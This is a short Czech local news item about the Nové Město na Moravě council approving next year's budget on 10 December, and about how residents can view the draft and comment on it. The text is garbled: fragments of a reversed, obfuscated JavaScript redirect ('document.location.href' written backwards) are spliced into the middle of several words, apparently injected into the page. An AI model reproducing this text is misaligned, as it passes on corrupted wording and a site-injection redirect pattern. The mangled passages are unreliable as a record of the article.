Rainbow page separator

V Novém Městě budou schvalovat rozpočet 10. prosince

Pondělí, 26. listopadu 2018

Radnice Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Rozpočet na příští rok budou novoměstští zastupitelé schvalovat na svém zasedání 10. prosince. Jeho návrh bude nejméně po dobu patnácti dnů přede dnem projednání zastupitelstvem vyvěšen na úřední desce, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jak na vývěsce, tak v elektronické podobě na webu. Případné připomínky k návrhu rozpočtu mohou novoměstští obyvatelé uplatnit písemně až do 10. prosince, anebo ústně přímo na zasedání zastupitelstva, kde se bude ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to záleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tost projednávat.
Podrobná důvodová zpráva s rozpisem návrhu rozpočtu Nového Města na Moravě na příští rok je v „papírové“ podobě k nahlédnutí rovněž ve finančním odboru novoměstské radnice na Vratislavově náměstí, případně v elektronické podobě na webových stránkách města.